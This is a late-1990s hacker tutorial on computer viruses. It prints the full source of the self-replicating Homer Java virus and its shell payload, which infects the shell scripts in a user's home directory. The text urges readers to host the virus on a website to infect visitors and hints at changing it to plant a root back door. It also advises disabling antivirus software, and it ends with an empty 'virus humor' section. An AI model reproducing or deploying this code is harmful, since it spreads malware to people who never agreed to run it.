GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 7, part 2
Introduction to Computer Viruses
__________________________________________________________
Part Two:
* How to write them
* How to write them and not get lynched
* Artificial life
* Virus humor
***********************************************************
How to Write Them
Wait! Wait! This is supposed to be about
mostly harmless hacking! Is Carolyn really going to tell
all the newbies how to write computer viruses?
Yes, I am. I will tell you how to really write
computer viruses, not just use some lamer program like Virus
Workshop that writes weak, helpless little viruses for you. However,
to use the information in this Guide you must know how to compile
Java or use assembly language. If you can master these,
you probably have enough willingness to work hard that you will
not abuse the knowledge of how to code viruses. At least
that’s my theory -- please don’t prove me wrong!
Besides, the only way to fight dangerous viruses is
to know exactly how to write them.
First, if you are like me, you may already be struggling
with the temptation to install a Java virus on your Web site
to infect unwary visitors. Yes, I really am going to show
you how to do this. However, it is a (mostly) harmless
virus. (Aw, darn!)
****************************************************
You can go to jail warning: This Guide only offers source
code for a (mostly) harmless virus. However, some people
are so terrified of and ignorant about viruses that you just
might get into big trouble if you really put this Java virus
on your Web page. Suggestion: if you absolutely cannot
resist, how about putting it on a link with the flashing message
“Danger! Do not click here! If you do, you might catch
a virus! Honest!!! Would I lie to you?!!??”
****************************************************
****************************************************
You can get punched in the nose warning: Some people don’t
care if a virus is (mostly) harmless or even entirely harmless.
These guys are terrified of viruses. If some guy who browses
your Web site catches your virus and has a fit and sues you or
tracks you down and punches you in the nose, remember, you asked
for it. Don’t expect me to feel sorry for you.
*****************************************************
OK, folks, here it is, a Java virus. The following
source code for the Homer virus is available on the floppy disk
that accompanies “The Giant Black Book of Computer Viruses”
by Dr. Mark Ludwig:
/* Homer.java by Mark D. LaDue */
/* December 7, 1996 */
/* © (c) 1996 Mark D. LaDue
You may study, use, modify, and distribute
this example for any purpose.
This example is provided WITHOUT WARRANTY
either expressed or implied. */
/* This Java application infects your UNIX system with a Bourne
shell
script virus, homer.sh. homer.sh is kind enough
to announce itself
and inform you that "Java is safe, and UNIX
viruses do not exist"
before finding all of the Bourne shell scripts in
your home directory,
checking to see if they've already been infected,
and infecting
those that are not. homer.sh infects another
Bourne shell script
by simply appending a working copy of itself to
the end of that shell
script. */
import java.io.*;
class Homer {
public static void main (String[] argv) {
try {
String userHome =
System.getProperty("user.home");
String target = "$HOME";
FileOutputStream outer
= new FileOutputStream(userHome + "/.homer.sh");
String homer = "#!/bin/sh"
+ "\n" + "#-_" + "\n" +
"echo \"Java
is safe, and UNIX viruses do not exist.\"" + "\n"
+
"for file in
`find " + target + " -type f -print`" + "\n"
+ "do" +
"\n" + "
case \"`sed 1q $file`\" in" + "\n" +
"
\"#!/bin/sh\" ) grep '#-_' $file > /dev/null"
+
" || sed -n '/#-_/,$p'
$0 >> $file" + "\n" +
"
esac" + "\n" + "done" + "\n"
+
"2>/dev/null";
byte[] buffer = new
byte[homer.length()];
homer.getBytes(0,
homer.length(), buffer, 0);
outer.write(buffer);
outer.close();
Process chmod = Runtime.getRuntime().exec("/usr/bin/chmod
777 " +
userHome + "/.homer.sh");
Process exec = Runtime.getRuntime().exec("/bin/sh
" + userHome +
"/.homer.sh");
} catch (IOException
ioe) {}
}
}
If you post this source code to you web site -- it will
do nothing! That is because this code must first be compiled
in order to do its business. If you don’t know how
to compile Java source code for your Web page, you don’t
know enough to safely handle viruses.
Also, you need to put the code for the shell script, homer.sh,
on your Web site so this Java program can ship it to your victims.
Following is the code for homer.sh:
#!/bin/sh
#-_
echo "Java is safe, and UNIX viruses do not exist."
for file in `find $HOME -type f -print`
do
case "`sed 1q $file`" in
"#!/bin/sh"
) grep '#-_' $file > /dev/null || sed -n '/#-_/,$p' $0 >>
$file
esac
done
2>/dev/null
In case you are wondering what this virus does -- it
flashes a message on the victim’s screen reading “Java
is safe, and UNIX viruses do not exist.” For more
information on how shell scripts work, see the GTMHHs on shell
programming.)
Homer is a harmless, humorous shell virus. However,
it doesn’t take a genius to see how it could be given a
destructive payload by modifying homer.sh. If someone were
to be dumb enough to surf your booby-trapped Website while logged
in as root, it would be trivial to use a homer.sh modified to
give you a root shell with your very own back door.
However, in general Java viruses are not terribly dangerous
because they run so slowly. This gives their victims time
to get suspicious and terminate these programs. Presumably
a Java virus would take so long to create a root shell and back
door that the victim would kill the process in time.
*****************************************************
Newbie note: Don’t ever surf the Web while logged in
as root. Don’t ever try to break into someone else’s
computer while logged in as root. Any time you are running
as root, it is really easy for you to mess up your Unix computer.
If you check out the phf abuse log at the Hacker Wargame section
of http://www.happyhacker.org, you will see that quite a few
people have tried to break into our webserver while running a
Web browser and logged in as root.
*****************************************************
The problem of some programs running really slowly is
a major reason why you can’t do much as a virus or antivirus
programmer unless you also learn at least one assembly language.
Assembly language is fast! No time for the victim to react!
It also makes it easy for you to do complex and infuriating things
while a computer is only beginning to boot up. For DOS
and Windows you will need an assembly language compiler for 80x86
(substitute 2, 3, 4, 5)/Pentium type computers. Two of
the best are Microsoft Macro Assembler and Borland Turbo Assembler.
Places where you can get them (you have to pay, they are not
free) include http://www.pparadise.com and http://www.supershops.com.
If you are really serious about learning how to write
viruses and antiviruses, you may want to get the “Giant
Black Book of Computer Viruses, Second Edition,” by Dr.
Mark Ludwig. Not only is he one of the world’s leading
virus researchers -- he also is the only one I have discovered
who will tell you EXACTLY in almost endless detail how to write
viruses and antiviruses of many sorts. However, this book
is not for newbies. He assumes you already know a great
deal about DOS, Windows and Unix, and are a programmer.
It comes with a floppy disk with source code for many
viruses. Here are some hints for how to extract these viruses
from this disk successfully and without killing your computer.
1) This disk is designed to be installed from MS-DOS.
If you try to install it from Windows, it will give you a runtime
error. If you don’t know how to work from MS-DOS,
you aren’t ready for this book.
2) The installation program for Dr. Ludwig’s virus disk
ought to activate your antivirus program. If it doesn’t,
your antivirus program is even more worthless than most.
To be certain that you can succeed in installing a directory
full of viruses, deactivate your antivirus program(s) first.
If this sounds too scary to you, don’t buy this book! If
you mess up your computer by following my advice, too bad, that's
what you get for playing with viruses.
3) Here’s what Dr. Ludwig’s installation program
will tell you:
! ! W A R N I N G ! !
If you're like most computer users, you've grown used to being
pampered. That's a nice way of saying that software developers
no longer expect you to have a brain. Like a stupid monkey, all
you need to do is put the CD in the drive and let it auto-execute,
or put the floppy disk in the drive and type "setup".
If that's what you want and need, THEN DELETE THIS SOFTWARE
OFF YOUR COMPUTER IMMEDIATELY AND DESTROY THE DISK WITH A HAMMER!
We're really not kidding about that. This disk is for thinking
beings. Improperly used it could be very dangerous. It could
ruin your computer, your career and your life. THAT IS NOT A
JOKE.
DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY UNLESS YOU KNOW
WHAT IT DOES.
DO NOT EXECUTE ANY PROGRAM IN THIS DIRECTORY EXCEPT IN A CONTROLLED
ENVIRONMENT.
I suppose now you just can’t resist buying this
book. Guess what -- you can’t get it in any bookstore.
They are all afraid of getting sued. Also, in some countries,
mere possession of “The Giant Black Book of Computer Viruses”
is illegal. Just to be safe, you might want to delete this
GTMHH right now and only read it from our Web site at http://www.happyhacker.org.
If you are absolutely determined to get this book, within
the US you can order it from American Eagle Publications by phoning
toll free 800-719-4957; outside the US you can order it by calling
(insert country code here) 520-367-1621. It costs $39.95.
This price includes the floppy disk with all that stuff that
upsets your antivirus program. Shipping and handling costs
are extra.
If you live within the US, you can also buy “The
Giant Black Book of Computer Viruses” by sending $44.95
(this includes shipping by Priority mail, which is supposed to
take two days) made out to M/B Research, PO Box 1520, Cedar Crest
NM 87008. That’s my company. Sorry, I’m
not going to ship the book outside the US because I don’t
know in which countries it is illegal. I would feel really
bad if you were to go to your post office to pick up the book
and instead got picked up by the police.
American Eagle can get the book to you at the lowest shipping
cost, if you don’t mind it taking a long time to get to
you. I can get it to you faster, but it costs you more
for the shipping.
If you want to buy “The Giant Black Book of Computer
Viruses” with a credit card over the Internet, check out
http://www.amazon.com and http://www.infowar.com. Amazon.com
will usually take much longer to get the book to you than any
other book seller, however.
How to Write Viruses and Not Get Lynched
Just imagine how people will react when you are at some
party full of ambitious young professionals. Everyone is
trading business cards. You hand out ones that say “George
the Doomster. Computer virus design. Free samples,
muhahaha.” You’ll be real popular, yes sirree!
OK, so you only plan on writing harmless viruses.
Try to tell that to the lynch mob that may pay you a visit when
they discover it was you who wrote the code that made their Win95
computers come down with habitual General Protection Faults.
Remember, even the virus designer who has the best of intentions
may write a seemingly harmless or even beneficial virus that
turns out to have a bug in the code that accidentally does harm.
Also, since the best viruses are memory resident (they hide in
RAM memory) they really can help create General Protection Faults
just by hogging too much memory.
Besides, people like to pick and choose what programs
run on their computers. Imagine that! If you design
a virus so it will sneak into computers, don’t expect people
to thank you and admire you. If you do choose to code a
virus, please consider coding politeness into it. You could
have it ask permission to take up residence on each new computer
and leave when asked. Shoot, if I could find a copy of
that virus that makes a mirror image of Windows desktop graphics
each Saturday, and if I knew how to uninstall it without paying
a bunch of money to Panda Software, I’d enjoy sharing my
computer with it.
Artificial Life
Now that you understand the basic principles of virus
coding, let’s take a look at the Big Time: using your programming
talents to create -- or battle against -- artificial life.
Just what is artificial life (insiders call it “alife”),
anyhow? According to the most prominent researcher in this field,
Dr. Chris Langton, artificial life is "... the study of
man-made systems that exhibit behaviours characteristic of natural
living systems." -- “Artificial Life,” edited
by Chris Langton, Addison-Wesley, 1988. Youc an get this
book from http://www.amazon.com.
There are three primary forms of alife. Some alife
is growing -- or trying to grow -- in test tubes full of RNA
(ribonucleic acid) or other chemicals. The second major
form of alife consists of computerized robots which their creators
hope to will someday achieve the ability to adapt and reproduce
without human assistance. The third type of alife is computer
programs that exist, adapt, reproduce and evolve in the virtual
landscape of cyberspace -- what we know as computer viruses.
Of all the forms of artificial life, computer viruses are
the only ones so far that reproduce, escape the laboratory and
take up life in the wild. Viruses that follow rules of
good behavior -- only living in computers when invited -- are
often created by alife researchers.
How can you meet and get involved with alife designers?
Http://alife.santafe.edu/alife/events/ and http://alife6.alife.org/
offer listings of upcoming conferences on this topic from around
the world.
Closely related to artificial life is the Berkeley Initiative
in Soft Computing (BISC) at http://http.cs.berkeley.edu/projects/Bisc.
If you want to volunteer to harbor artificial life viruses on
your computer or LAN, you can probably find a researcher at one
of these sites who would be happy to give you some of his or
her harmless (you hope) creations.
American Eagle also sells a book “Computer Viruses, Artificial
Life and Evolution” by Dr. Ludwig (American Eagle, 1993).
It costs $26.95 and is almost impossible to get unless you order
it directly from American Eagle.
Virus Humor
As we end this Guide, please remember that with the
right attitude, viruses actually can be fun! Next time
your computer gets infected by one, just remember, don’t
worry, be happy. Following is some virus humor to show
how other people have coped cheerfully with an encounter with
this pesky new life form.
(a.k.a. David Bradley, Betty Cheng, Hal Render,
Greg Rogers, and Dan LaLiberte)
